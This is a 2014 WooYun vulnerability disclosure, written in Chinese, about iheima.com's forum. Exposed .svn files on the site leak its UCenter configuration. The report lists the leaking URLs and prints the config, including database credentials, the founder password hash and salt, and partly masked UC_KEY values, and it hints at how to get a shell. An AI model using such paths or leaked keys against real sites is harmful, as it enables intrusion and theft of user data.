漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-083118
漏洞标题:爱黑马某站配置不当可getshell
相关厂商:iheima.com
漏洞作者: 爱上平顶山
提交时间:2014-11-13 15:30
修复时间:2014-12-28 15:32
公开时间:2014-12-28 15:32
漏洞类型:应用配置错误
危害等级:高
自评Rank:12
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-11-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-28: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
...
详细说明:
爱黑马
http://bbs1.iheima.com/ 貌似内部论坛?
http://bbs1.iheima.com/uc_server/.svn/entries
http://bbs1.iheima.com/uc_server/data/.svn/text-base/config.inc.php.svn-base
http://bbs1.iheima.com/admin.php
define('UC_DBHOST', 'localhost');
define('UC_DBUSER', 'root');
define('UC_DBPW', 'root');
define('UC_DBNAME', 'discuz');
define('UC_DBCHARSET', 'utf8');
define('UC_DBTABLEPRE', 'ucenter_');
define('UC_COOKIEPATH', '/');
define('UC_COOKIEDOMAIN', '');
define('UC_DBCONNECT', 0);
define('UC_CHARSET', 'utf-8');
define('UC_FOUNDERPW', '4545c05011a611d928740967fcf342c1');
define('UC_FOUNDERSALT', 'k922g3');
define('UC_KEY', 'B9A2z3kcvfm9Ebz*******4cDbScGda0K6g88c1425i9idY5udedr1id');
define('UC_SITEID', 'E9P2c3xclfn9SbmbrepbV9T015C6V9WcCb1cKdQ0e6d8VcN4Y5B9kdo5Vd2dA1xd');
define('UC_MYKEY', 'm9R2C3YcXfQ9jbBbFePbz980f596m90********x6J8mcf4w5P9rdP5vdWdr1jd');
define('UC_DEBUG', false);
define('UC_PPP', 20);
有了UC_KEY 能干吗?
如何GET SHELL,参照
WooYun: 途牛网某服务配置失误 导致论坛敏感文件泄露(致使百万用户信息告急)
ok~ 仅测试~
漏洞证明:
如上
修复方案:
...
版权声明:转载请注明来源 爱上平顶山@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝